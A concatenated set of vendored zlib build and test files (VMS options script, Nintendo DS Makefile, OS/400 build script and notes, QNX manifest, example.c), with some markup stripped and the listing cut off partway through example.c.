"gzclose#gzerror#gzgetc#gzgets#gzopen#gzprintf#gzputc#gzputs#gzread" $ module3 = "gzseek#gztell#inflate#inflateEnd#inflateInit_#inflateSetDictionary" $ module4 = "inflateSync#uncompress#zlibVersion#compress" $ open/read map 'p1 $ if axp .or. ia64 $ then $ open/write aopt a.opt $ open/write bopt b.opt $ write aopt " CASE_SENSITIVE=YES" $ write bopt "SYMBOL_VECTOR= (-" $ mod_sym_num = 1 $ MOD_SYM_LOOP: $ if f$type(module'mod_sym_num') .nes. "" $ then $ mod_in = 0 $ MOD_SYM_IN: $ shared_proc = f$element(mod_in, "#", module'mod_sym_num') $ if shared_proc .nes. "#" $ then $ write aopt f$fao(" symbol_vector=(!AS/!AS=PROCEDURE)",- f$edit(shared_proc,"upcase"),shared_proc) $ write bopt f$fao("!AS=PROCEDURE,-",shared_proc) $ mod_in = mod_in + 1 $ goto mod_sym_in $ endif $ mod_sym_num = mod_sym_num + 1 $ goto mod_sym_loop $ endif $MAP_LOOP: $ read/end=map_end map line $ if (f$locate("{",line).lt. f$length(line)) .or. - (f$locate("global:", line) .lt. f$length(line)) $ then $ proc = true $ goto map_loop $ endif $ if f$locate("}",line).lt. f$length(line) then proc = false $ if f$locate("local:", line) .lt. f$length(line) then proc = false $ if proc $ then $ shared_proc = f$edit(line,"collapse") $ chop_semi = f$locate(";", shared_proc) $ if chop_semi .lt. f$length(shared_proc) then - shared_proc = f$extract(0, chop_semi, shared_proc) $ write aopt f$fao(" symbol_vector=(!AS/!AS=PROCEDURE)",- f$edit(shared_proc,"upcase"),shared_proc) $ write bopt f$fao("!AS=PROCEDURE,-",shared_proc) $ endif $ goto map_loop $MAP_END: $ close/nolog aopt $ close/nolog bopt $ open/append libopt 'p2' $ open/read aopt a.opt $ open/read bopt b.opt $ALOOP: $ read/end=aloop_end aopt line $ write libopt line $ goto aloop $ALOOP_END: $ close/nolog aopt $ sv = "" $BLOOP: $ read/end=bloop_end bopt svn $ if (svn.nes."") $ then $ if (sv.nes."") then write libopt sv $ sv = svn $ endif $ goto bloop $BLOOP_END: $ write libopt f$extract(0,f$length(sv)-2,sv), "-" $ write libopt ")" $ close/nolog bopt $ delete/nolog/noconf a.opt;*,b.opt;* $ else $ if vax $ then $ open/append libopt 'p2' $ mod_sym_num = 1 $ VMOD_SYM_LOOP: $ if f$type(module'mod_sym_num') .nes. "" $ then $ mod_in = 0 $ VMOD_SYM_IN: $ shared_proc = f$element(mod_in, "#", module'mod_sym_num') $ if shared_proc .nes. "#" $ then $ write libopt f$fao("UNIVERSAL=!AS",- f$edit(shared_proc,"upcase")) $ mod_in = mod_in + 1 $ goto vmod_sym_in $ endif $ mod_sym_num = mod_sym_num + 1 $ goto vmod_sym_loop $ endif $VMAP_LOOP: $ read/end=vmap_end map line $ if (f$locate("{",line).lt. f$length(line)) .or. - (f$locate("global:", line) .lt. f$length(line)) $ then $ proc = true $ goto vmap_loop $ endif $ if f$locate("}",line).lt. f$length(line) then proc = false $ if f$locate("local:", line) .lt. f$length(line) then proc = false $ if proc $ then $ shared_proc = f$edit(line,"collapse") $ chop_semi = f$locate(";", shared_proc) $ if chop_semi .lt. f$length(shared_proc) then - shared_proc = f$extract(0, chop_semi, shared_proc) $ write libopt f$fao("UNIVERSAL=!AS",- f$edit(shared_proc,"upcase")) $ endif $ goto vmap_loop $VMAP_END: $ else $ write sys$output "Unknown Architecture (Not VAX, AXP, or IA64)" $ write sys$output "No options file created" $ endif $ endif $ EXIT_M2S: $ close/nolog map $ close/nolog libopt $ endsubroutine ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/nintendods/Makefile ================================================ #--------------------------------------------------------------------------------- .SUFFIXES: #--------------------------------------------------------------------------------- ifeq ($(strip $(DEVKITARM)),) $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") endif include $(DEVKITARM)/ds_rules #--------------------------------------------------------------------------------- # TARGET is the name of the output # BUILD is the directory where object files & intermediate files will be placed # SOURCES is a list of directories containing source code # DATA is a list of directories containing data files # INCLUDES is a list of directories containing header files #--------------------------------------------------------------------------------- TARGET := $(shell basename $(CURDIR)) BUILD := build SOURCES := ../../ DATA := data INCLUDES := include #--------------------------------------------------------------------------------- # options for code generation #--------------------------------------------------------------------------------- ARCH := -mthumb -mthumb-interwork CFLAGS := -Wall -O2\ -march=armv5te -mtune=arm946e-s \ -fomit-frame-pointer -ffast-math \ $(ARCH) CFLAGS += $(INCLUDE) -DARM9 CXXFLAGS := $(CFLAGS) -fno-rtti -fno-exceptions ASFLAGS := $(ARCH) -march=armv5te -mtune=arm946e-s LDFLAGS = -specs=ds_arm9.specs -g $(ARCH) -Wl,-Map,$(notdir $*.map) #--------------------------------------------------------------------------------- # list of directories containing libraries, this must be the top level containing # include and lib #--------------------------------------------------------------------------------- LIBDIRS := $(LIBNDS) #--------------------------------------------------------------------------------- # no real need to edit anything past this point unless you need to add additional # rules for different file extensions #--------------------------------------------------------------------------------- ifneq ($(BUILD),$(notdir $(CURDIR))) #--------------------------------------------------------------------------------- export OUTPUT := $(CURDIR)/lib/libz.a export VPATH := $(foreach dir,$(SOURCES),$(CURDIR)/$(dir)) \ $(foreach dir,$(DATA),$(CURDIR)/$(dir)) export DEPSDIR := $(CURDIR)/$(BUILD) CFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.c))) CPPFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.cpp))) SFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.s))) BINFILES := $(foreach dir,$(DATA),$(notdir $(wildcard $(dir)/*.*))) #--------------------------------------------------------------------------------- # use CXX for linking C++ projects, CC for standard C #--------------------------------------------------------------------------------- ifeq ($(strip $(CPPFILES)),) #--------------------------------------------------------------------------------- export LD := $(CC) #--------------------------------------------------------------------------------- else #--------------------------------------------------------------------------------- export LD := $(CXX) #--------------------------------------------------------------------------------- endif #--------------------------------------------------------------------------------- export OFILES := $(addsuffix .o,$(BINFILES)) \ $(CPPFILES:.cpp=.o) $(CFILES:.c=.o) $(SFILES:.s=.o) export INCLUDE := $(foreach dir,$(INCLUDES),-I$(CURDIR)/$(dir)) \ $(foreach dir,$(LIBDIRS),-I$(dir)/include) \ -I$(CURDIR)/$(BUILD) .PHONY: $(BUILD) clean all #--------------------------------------------------------------------------------- all: $(BUILD) @[ -d $@ ] || mkdir -p include @cp ../../*.h include lib: @[ -d $@ ] || mkdir -p $@ $(BUILD): lib @[ -d $@ ] || mkdir -p $@ @$(MAKE) --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile #--------------------------------------------------------------------------------- clean: @echo clean ... @rm -fr $(BUILD) lib #--------------------------------------------------------------------------------- else DEPENDS := $(OFILES:.o=.d) #--------------------------------------------------------------------------------- # main targets #--------------------------------------------------------------------------------- $(OUTPUT) : $(OFILES) #--------------------------------------------------------------------------------- %.bin.o : %.bin #--------------------------------------------------------------------------------- @echo $(notdir $<) @$(bin2o) -include $(DEPENDS) #--------------------------------------------------------------------------------------- endif #--------------------------------------------------------------------------------------- ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/nintendods/README ================================================ This Makefile requires devkitARM (http://www.devkitpro.org/category/devkitarm/) and works inside "contrib/nds". It is based on a devkitARM template. Eduardo Costa January 3, 2009 ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/os400/README400 ================================================ ZLIB version 1.3.0 for OS/400 installation instructions 1) Download and unpack the zlib tarball to some IFS directory. (i.e.: /path/to/the/zlib/ifs/source/directory) If the installed IFS command supports gzip format, this is straightforward, else you have to unpack first to some directory on a system supporting it, then move the whole directory to the IFS via the network (via SMB or FTP). 2) Edit the configuration parameters in the compilation script. EDTF STMF('/path/to/the/zlib/ifs/source/directory/os400/make.sh') Tune the parameters according to your needs if not matching the defaults. Save the file and exit after edition. 3) Enter qshell, then work in the zlib OS/400 specific directory. QSH cd /path/to/the/zlib/ifs/source/directory/os400 4) Compile and install sh make.sh The script will: - create the libraries, objects and IFS directories for the zlib environment, - compile all modules, - create a service program, - create a static and a dynamic binding directory, - install header files for C/C++ and for ILE/RPG, both for compilation in DB2 and IFS environments. That's all. Notes: For OS/400 ILE RPG programmers, a /copy member defining the ZLIB API prototypes for ILE RPG can be found in ZLIB/H(ZLIB.INC). In the ILE environment, the same definitions are available from file zlib.inc located in the same IFS include directory as the C/C++ header files. Please read comments in this member for more information. Remember that most foreign textual data are ASCII coded: this implementation does not handle conversion from/to ASCII, so text data code conversions must be done explicitly. Mainly for the reason above, always open zipped files in binary mode. ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/os400/bndsrc ================================================ STRPGMEXP PGMLVL(*CURRENT) SIGNATURE('ZLIB') /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.1.3 entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("adler32") EXPORT SYMBOL("compress") EXPORT SYMBOL("compress2") EXPORT SYMBOL("crc32") EXPORT SYMBOL("get_crc_table") EXPORT SYMBOL("deflate") EXPORT SYMBOL("deflateEnd") EXPORT SYMBOL("deflateSetDictionary") EXPORT SYMBOL("deflateCopy") EXPORT SYMBOL("deflateReset") EXPORT SYMBOL("deflateParams") EXPORT SYMBOL("deflatePrime") EXPORT SYMBOL("deflateInit_") EXPORT SYMBOL("deflateInit2_") EXPORT SYMBOL("gzopen") EXPORT SYMBOL("gzdopen") EXPORT SYMBOL("gzsetparams") EXPORT SYMBOL("gzread") EXPORT SYMBOL("gzwrite") EXPORT SYMBOL("gzprintf") EXPORT SYMBOL("gzputs") EXPORT SYMBOL("gzgets") EXPORT SYMBOL("gzputc") EXPORT SYMBOL("gzgetc") EXPORT SYMBOL("gzflush") EXPORT SYMBOL("gzseek") EXPORT SYMBOL("gzrewind") EXPORT SYMBOL("gztell") EXPORT SYMBOL("gzeof") EXPORT SYMBOL("gzclose") EXPORT SYMBOL("gzerror") EXPORT SYMBOL("inflate") EXPORT SYMBOL("inflateEnd") EXPORT SYMBOL("inflateSetDictionary") EXPORT SYMBOL("inflateSync") EXPORT SYMBOL("inflateReset") EXPORT SYMBOL("inflateInit_") EXPORT SYMBOL("inflateInit2_") EXPORT SYMBOL("inflateSyncPoint") EXPORT SYMBOL("uncompress") EXPORT SYMBOL("zlibVersion") EXPORT SYMBOL("zError") EXPORT SYMBOL("z_errmsg") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.1 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("compressBound") EXPORT SYMBOL("deflateBound") EXPORT SYMBOL("deflatePending") EXPORT SYMBOL("gzungetc") EXPORT SYMBOL("gzclearerr") EXPORT SYMBOL("inflateBack") EXPORT SYMBOL("inflateBackEnd") EXPORT SYMBOL("inflateBackInit_") EXPORT SYMBOL("inflateCopy") EXPORT SYMBOL("zlibCompileFlags") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.4 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("adler32_combine") EXPORT SYMBOL("adler32_combine64") EXPORT SYMBOL("crc32_combine") EXPORT SYMBOL("crc32_combine64") EXPORT SYMBOL("deflateSetHeader") EXPORT SYMBOL("deflateTune") EXPORT SYMBOL("gzbuffer") EXPORT SYMBOL("gzclose_r") EXPORT SYMBOL("gzclose_w") EXPORT SYMBOL("gzdirect") EXPORT SYMBOL("gzoffset") EXPORT SYMBOL("gzoffset64") EXPORT SYMBOL("gzopen64") EXPORT SYMBOL("gzseek64") EXPORT SYMBOL("gztell64") EXPORT SYMBOL("inflateGetHeader") EXPORT SYMBOL("inflateMark") EXPORT SYMBOL("inflatePrime") EXPORT SYMBOL("inflateReset2") EXPORT SYMBOL("inflateUndermine") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.6 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("deflateResetKeep") EXPORT SYMBOL("gzgetc_") EXPORT SYMBOL("inflateResetKeep") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.8 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("gzvprintf") EXPORT SYMBOL("inflateGetDictionary") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.9 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("adler32_z") EXPORT SYMBOL("crc32_z") EXPORT SYMBOL("deflateGetDictionary") EXPORT SYMBOL("gzfread") EXPORT SYMBOL("gzfwrite") EXPORT SYMBOL("inflateCodesUsed") EXPORT SYMBOL("inflateValidate") EXPORT SYMBOL("uncompress2") /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ /* Version 1.2.12 additional entry points. */ /*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/ EXPORT SYMBOL("crc32_combine_gen64") EXPORT SYMBOL("crc32_combine_gen") EXPORT SYMBOL("crc32_combine_op") ENDPGMEXP ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/os400/make.sh ================================================ #!/bin/sh # # ZLIB compilation script for the OS/400. # # # This is a shell script since make is not a standard component of OS/400. ################################################################################ # # Tunable configuration parameters. # ################################################################################ TARGETLIB='ZLIB' # Target OS/400 program library STATBNDDIR='ZLIB_A' # Static binding directory. DYNBNDDIR='ZLIB' # Dynamic binding directory. SRVPGM="ZLIB" # Service program. IFSDIR='/zlib' # IFS support base directory. TGTCCSID='500' # Target CCSID of objects DEBUG='*NONE' # Debug level OPTIMIZE='40' # Optimisation level OUTPUT='*NONE' # Compilation output option. TGTRLS='V6R1M0' # Target OS release export TARGETLIB STATBNDDIR DYNBNDDIR SRVPGM IFSDIR export TGTCCSID DEBUG OPTIMIZE OUTPUT TGTRLS ################################################################################ # # OS/400 specific definitions. # ################################################################################ LIBIFSNAME="/QSYS.LIB/${TARGETLIB}.LIB" ################################################################################ # # Procedures. # ################################################################################ # action_needed dest [src] # # dest is an object to build # if specified, src is an object on which dest depends. # # exit 0 (succeeds) if some action has to be taken, else 1. action_needed() { [ ! -e "${1}" ] && return 0 [ "${2}" ] || return 1 [ "${1}" -ot "${2}" ] && return 0 return 1 } # make_module module_name source_name [additional_definitions] # # Compile source name into module if needed. # As side effect, append the module name to variable MODULES. # Set LINK to "YES" if the module has been compiled. make_module() { MODULES="${MODULES} ${1}" MODIFSNAME="${LIBIFSNAME}/${1}.MODULE" CSRC="`basename \"${2}\"`" if action_needed "${MODIFSNAME}" "${2}" then : elif [ ! "`sed -e \"//,/<\\\\/source>/!d\" \ -e '/ tmphdrfile # Need to translate to target CCSID. CMD="CPY OBJ('`pwd`/tmphdrfile') TOOBJ('${DEST}')" CMD="${CMD} TOCCSID(${TGTCCSID}) DTAFMT(*TEXT) REPLACE(*YES)" system "${CMD}" # touch -r "${HFILE}" "${DEST}" rm -f tmphdrfile fi IFSFILE="${IFSDIR}/include/`basename \"${HFILE}\"`" if action_needed "${IFSFILE}" "${DEST}" then rm -f "${IFSFILE}" ln -s "${DEST}" "${IFSFILE}" fi done # Install the ILE/RPG header file. HFILE="${SCRIPTDIR}/zlib.inc" DEST="${SRCPF}/ZLIB.INC.MBR" if action_needed "${DEST}" "${HFILE}" then CMD="CPY OBJ('${HFILE}') TOOBJ('${DEST}')" CMD="${CMD} TOCCSID(${TGTCCSID}) DTAFMT(*TEXT) REPLACE(*YES)" system "${CMD}" # touch -r "${HFILE}" "${DEST}" fi IFSFILE="${IFSDIR}/include/`basename \"${HFILE}\"`" if action_needed "${IFSFILE}" "${DEST}" then rm -f "${IFSFILE}" ln -s "${DEST}" "${IFSFILE}" fi # Create and compile the identification source file. echo '#pragma comment(user, "ZLIB version '"${VERSION}"'")' > os400.c echo '#pragma comment(user, __DATE__)' >> os400.c echo '#pragma comment(user, __TIME__)' >> os400.c echo '#pragma comment(copyright, "Copyright (C) 1995-2017 Jean-Loup Gailly, Mark Adler. OS/400 version by P. Monnerat.")' >> os400.c make_module OS400 os400.c LINK= # No need to rebuild service program yet. MODULES= # Get source list. CSOURCES=`sed -e '/ Library Medium 2.0 zlib zlib alain.bonnefoy@icbt.com Public public www.gzip.org/zlib Jean-Loup Gailly,Mark Adler www.gzip.org/zlib zlib@gzip.org A massively spiffy yet delicately unobtrusive compression library. zlib is designed to be a free, general-purpose, legally unencumbered, lossless data compression library for use on virtually any computer hardware and operating system. http://www.gzip.org/zlib 1.3.0 Medium Stable No License Software Development/Libraries and Extensions/C Libraries zlib,compression qnx6 qnx6 None Developer Install Post No Ignore No Optional InstallOver zlib InstallOver zlib-dev ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/test/example.c ================================================ /* example.c -- usage example of the zlib compression library * Copyright (C) 1995-2006, 2011, 2016 Jean-loup Gailly * For conditions of distribution and use, see copyright notice in zlib.h */ /* @(#) $Id$ */ #include "zlib.h" #include #ifdef STDC # include # include #endif #if defined(VMS) || defined(RISCOS) # define TESTFILE "foo-gz" #else # define TESTFILE "foo.gz" #endif #define CHECK_ERR(err, msg) { \ if (err != Z_OK) { \ fprintf(stderr, "%s error: %d\n", msg, err); \ exit(1); \ } \ } static z_const char hello[] = "hello, hello!"; /* "hello world" would be more standard, but the repeated "hello" * stresses the compression code better, sorry... */ static const char dictionary[] = "hello"; static uLong dictId; /* Adler32 value of the dictionary */ #ifdef Z_SOLO void *myalloc(void *q, unsigned n, unsigned m) { (void)q; return calloc(n, m); } void myfree(void *q, void *p) { (void)q; free(p); } static alloc_func zalloc = myalloc; static free_func zfree = myfree; #else /* !Z_SOLO */ static alloc_func zalloc = (alloc_func)0; static free_func zfree = (free_func)0; /* =========================================================================== * Test compress() and uncompress() */ void test_compress(Byte *compr, uLong comprLen, Byte *uncompr, uLong uncomprLen) { int err; uLong len = (uLong)strlen(hello)+1; err = compress(compr, &comprLen, (const Bytef*)hello, len); CHECK_ERR(err, "compress"); strcpy((char*)uncompr, "garbage"); err = uncompress(uncompr, &uncomprLen, compr, comprLen); CHECK_ERR(err, "uncompress"); if (strcmp((char*)uncompr, hello)) { fprintf(stderr, "bad uncompress\n"); exit(1); } else { printf("uncompress(): %s\n", (char *)uncompr); } } /* =========================================================================== * Test read/write of .gz files */ void test_gzio(const char *fname, Byte *uncompr, uLong uncomprLen) { #ifdef NO_GZCOMPRESS fprintf(stderr, "NO_GZCOMPRESS -- gz* functions cannot compress\n"); #else int err; int len = (int)strlen(hello)+1; gzFile file; z_off_t pos; file = gzopen(fname, "wb"); if (file == NULL) { fprintf(stderr, "gzopen error\n"); exit(1); } gzputc(file, 'h'); if (gzputs(file, "ello") != 4) { fprintf(stderr, "gzputs err: %s\n", gzerror(file, &err)); exit(1); } if (gzprintf(file, ", %s!", "hello") != 8) { fprintf(stderr, "gzprintf err: %s\n", gzerror(file, &err)); exit(1); } gzseek(file, 1L, SEEK_CUR); /* add one zero byte */ gzclose(file); file = gzopen(fname, "rb"); if (file == NULL) { fprintf(stderr, "gzopen error\n"); exit(1); } strcpy((char*)uncompr, "garbage"); if (gzread(file, uncompr, (unsigned)uncomprLen) != len) { fprintf(stderr, "gzread err: %s\n", gzerror(file, &err)); exit(1); } if (strcmp((char*)uncompr, hello)) { fprintf(stderr, "bad gzread: %s\n", (char*)uncompr); exit(1); } else { printf("gzread(): %s\n", (char*)uncompr); } pos = gzseek(file, -8L, SEEK_CUR); if (pos != 6 || gztell(file) != pos) { fprintf(stderr, "gzseek error, pos=%ld, gztell=%ld\n", (long)pos, (long)gztell(file)); exit(1); } if (gzgetc(file) != ' ') { fprintf(stderr, "gzgetc error\n"); exit(1); } if (gzungetc(' ', file) != ' ') { fprintf(stderr, "gzungetc error\n"); exit(1); } gzgets(file, (char*)uncompr, (int)uncomprLen); if (strlen((char*)uncompr) != 7) { /* " hello!" */ fprintf(stderr, "gzgets err after gzseek: %s\n", gzerror(file, &err)); exit(1); } if (strcmp((char*)uncompr, hello + 6)) { fprintf(stderr, "bad gzgets after gzseek\n"); exit(1); } else { printf("gzgets() after gzseek: %s\n", (char*)uncompr); } gzclose(file); #endif } #endif /* Z_SOLO */ /* =========================================================================== * Test deflate() with small buffers */ void test_deflate(Byte *compr, uLong comprLen) { z_stream c_stream; /* compression stream */ int err; uLong len = (uLong)strlen(hello)+1; c_stream.zalloc = zalloc; c_stream.zfree = zfree; c_stream.opaque = (voidpf)0; err = deflateInit(&c_stream, Z_DEFAULT_COMPRESSION); CHECK_ERR(err, "deflateInit"); c_stream.next_in = (z_const unsigned char *)hello; c_stream.next_out = compr; while (c_stream.total_in != len && c_stream.total_out < comprLen) { c_stream.avail_in = c_stream.avail_out = 1; /* force small buffers */ err = deflate(&c_stream, Z_NO_FLUSH); CHECK_ERR(err, "deflate"); } /* Finish the stream, still forcing small buffers: */ for (;;) { c_stream.avail_out = 1; err = deflate(&c_stream, Z_FINISH); if (err == Z_STREAM_END) break; CHECK_ERR(err, "deflate"); } err = deflateEnd(&c_stream); CHECK_ERR(err, "deflateEnd"); } /* =========================================================================== * Test inflate() with small buffers */ void test_inflate(Byte *compr, uLong comprLen, Byte *uncompr, uLong uncomprLen) { int err; z_stream d_stream; /* decompression stream */ strcpy((char*)uncompr, "garbage"); d_stream.zalloc = zalloc; d_stream.zfree = zfree; d_stream.opaque = (voidpf)0; d_stream.next_in = compr; d_stream.avail_in = 0; d_stream.next_out = uncompr; err = inflateInit(&d_stream); CHECK_ERR(err, "inflateInit"); while (d_stream.total_out < uncomprLen && d_stream.total_in < comprLen) { d_stream.avail_in = d_stream.avail_out = 1; /* force small buffers */ err = inflate(&d_stream, Z_NO_FLUSH); if (err == Z_STREAM_END) break; CHECK_ERR(err, "inflate"); } err = inflateEnd(&d_stream); CHECK_ERR(err, "inflateEnd"); if (strcmp((char*)uncompr, hello)) { fprintf(stderr, "bad inflate\n"); exit(1); } else { printf("inflate(): %s\n", (char *)uncompr); } } /* =========================================================================== * Test deflate() with large buffers and dynamic change of compression level */ void test_large_deflate(Byte *compr, uLong comprLen, Byte *uncompr, uLong uncomprLen) { z_stream c_stream; /* compression stream */ int err; c_stream.zalloc = zalloc; c_stream.zfree = zfree; c_stream.opaque = (voidpf)0; err = deflateInit(&c_stream, Z_BEST_SPEED); CHECK_ERR(err, "deflateInit"); c_stream.next_out = compr; c_stream.avail_out = (uInt)comprLen; /* At this point, uncompr is still mostly zeroes, so it should compress * very well: */ c_stream.next_in = uncompr; c_stream.avail_in = (uInt)uncomprLen; err = deflate(&c_stream, Z_NO_FLUSH); CHECK_ERR(err, "deflate"); if (c_stream.avail_in != 0) { fprintf(stderr, "deflate not greedy\n"); exit(1); } /* Feed in already compressed data and switch to no compression: */ deflateParams(&c_stream, Z_NO_COMPRESSION, Z_DEFAULT_STRATEGY); c_stream.next_in = compr; c_stream.avail_in = (uInt)uncomprLen/2; err = deflate(&c_stream, Z_NO_FLUSH); CHECK_ERR(err, "deflate"); /* Switch back to compressing mode: */ deflateParams(&c_stream, Z_BEST_COMPRESSION, Z_FILTERED); c_stream.next_in = uncompr; c_stream.avail_in = (uInt)uncomprLen; err = deflate(&c_stream, Z_NO_FLUSH); CHECK_ERR(err, "deflate"); err = deflate(&c_stream, Z_FINISH); if (err != Z_STREAM_END) { fprintf(stderr, "deflate should report Z_STREAM_END\n"); exit(1); } err = deflateEnd(&c_stream); CHECK_ERR(err, "deflateEnd"); } /* =========================================================================== * Test inflate() with large buffers */ void test_large_inflate(Byte *compr, uLong comprLen, Byte *uncompr, uLong uncomprLen) { int err; z_stream d_stream; /* decompression stream */ strcpy((char*)uncompr, "garbage"); d_stream.zalloc = zalloc; d_stream.zfree = zfree; d_stream.opaque = (voidpf)0; d_stream.next_in = compr; d_stream.avail_in = (uInt)comprLen; err = inflateInit(&d_stream); CHECK_ERR(err, "inflateInit"); for (;;) { d_stream.next_out = uncompr; /* discard the output */ d_stream.avail_out = (uInt)uncomprLen; err = inflate(&d_stream, Z_NO_FLUSH); if (err == Z_STREAM_END) break; CHECK_ERR(err, "large inflate"); } err = inflateEnd(&d_stream); CHECK_ERR(err, "inflateEnd"); if (d_stream.total_out != 2*uncomprLen + uncomprLen/2) { fprintf(stderr, "bad large inflate: %ld\n", d_stream.total_out); exit(1); } else { printf("large_inflate(): OK\n"); } } /* =========================================================================== * Test deflate() with full flush */ void test_flush(Byte *compr, uLong *comprLen) { z_stream c_stream; /* compression stream */ int err; uInt len = (uInt)strlen(hello)+1; c_stream.zalloc = zalloc; c_stream.zfree = zfree; c_stream.opaque = (voidpf)0; err = deflateInit(&c_stream, Z_DEFAULT_COMPRESSION); CHECK_ERR(err, "deflateInit"); c_stream.next_in = (z_const unsigned char *)hello; c_stream.next_out = compr; c_stream.avail_in = 3; c_stream.avail_out = (uInt)*comprLen; err = deflate(&c_stream, Z_FULL_FLUSH); CHECK_ERR(err, "deflate"); compr[3]++; /* force an error in first compressed block */ c_stream.avail_in = len - 3; err = deflate(&c_stream, Z_FINISH); if (err != Z_STREAM_END) { CHECK_ERR(err, "deflate"); } err = deflateEnd(&c_stream); CHECK_ERR(err, "deflateEnd"); *comprLen = c_stream.total_out; } /* =========================================================================== * Test inflateSync() */ void test_sync(Byte *compr, uLong comprLen, Byte *uncompr, uLong uncomprLen) { int err; z_stream d_stream; /* decompression stream */ strcpy((char*)uncompr, "garbage"); d_stream.zalloc = zalloc; d_stream.zfree = zfree; d_stream.opaque = (voidpf)0; d_stream.next_in = compr; d_stream.avail_in = 2; /* just read the zlib header */ err = inflateInit(&d_stream); CHECK_ERR(err, "inflateInit"); d_stream.next_out = uncompr; d_stream.avail_out = (uInt)uncomprLen; err = inflate(&d_stream, Z_NO_FLUSH); CHECK_ERR(err, "inflate"); d_stream.avail_in = (uInt)comprLen-2; /* read all compressed data */ err = inflateSync(&d_stream); /* but skip the damaged part */ CHECK_ERR(err, "inflateSync"); err = inflate(&d_stream, Z_FINISH); if (err != Z_STREAM_END) { fprintf(stderr, "inflate should report Z_STREAM_END\n"); exit(1); } err = inflateEnd(&d_stream); CHECK_ERR(err, "inflateEnd"); printf("after inflateSync(): hel%s\n", (char *)uncompr); } /* =========================================================================== * Test deflate() with preset dictionary */ void test_dict_deflate(Byte *compr, uLong comprLen) { z_stream c_stream; /* compression stream */ int err; c_stream.zalloc = zalloc; c_stream.zfree = zfree; c_stream.opaque = (voidpf)0; err = deflateInit(&c_stream, Z_BEST_COMPRESSION); CHECK_ERR(err, "deflateInit"); err = deflateSetDictionary(&c_stream, (const Bytef*)dictionary, (int)sizeof(dictionary)); CHECK_ERR(err, "deflateSetDictionary"); dictId = c_stream.adler; c_stream.next_out = compr; c_stream.avail_out = (uInt)comprLen; c_stream.next_in = (z_const unsigned char *)hello; c_stream.avail_in = (uInt)strlen(hello)+1; err = deflate(&c_stream, Z_FINISH); if (err != Z_STREAM_END) { fprintf(stderr, "deflate should report Z_STREAM_END\n"); exit(1); } err = deflateEnd(&c_stream); CHECK_ERR(err, "deflateEnd"); } /* =========================================================================== * Test inflate() with a preset dictionary */ void test_dict_inflate(Byte *compr, uLong comprLen, Byte *uncompr, uLong uncomprLen) { int err; z_stream d_stream; /* decompression stream */ strcpy((char*)uncompr, "garbage"); d_stream.zalloc = zalloc; d_stream.zfree = zfree; d_stream.opaque = (voidpf)0; d_stream.next_in = compr; d_stream.avail_in = (uInt)comprLen; err = inflateInit(&d_stream); CHECK_ERR(err, "inflateInit"); d_stream.next_out = uncompr; d_stream.avail_out = (uInt)uncomprLen; for (;;) { err = inflate(&d_stream, Z_NO_FLUSH); if (err == Z_STREAM_END) break; if (err == Z_NEED_DICT) { if (d_stream.adler != dictId) { fprintf(stderr, "unexpected dictionary"); exit(1); } err = inflateSetDictionary(&d_stream, (const Bytef*)dictionary, (int)sizeof(dictionary)); } CHECK_ERR(err, "inflate with dict"); } err = inflateEnd(&d_stream); CHECK_ERR(err, "inflateEnd"); if (strcmp((char*)uncompr, hello)) { fprintf(stderr, "bad inflate with dict\n"); exit(1); } else { printf("inflate with dictionary: %s\n", (char *)uncompr); } } /* =========================================================================== * Usage: example [output.gz [input.gz]] */ int main(int argc, char *argv[]) { Byte *compr, *uncompr; uLong uncomprLen = 20000; uLong comprLen = 3 * uncomprLen; static const char* myVersion = ZLIB_VERSION; if (zlibVersion()[0] != myVersion[0]) { fprintf(stderr, "incompatible zlib version\n"); 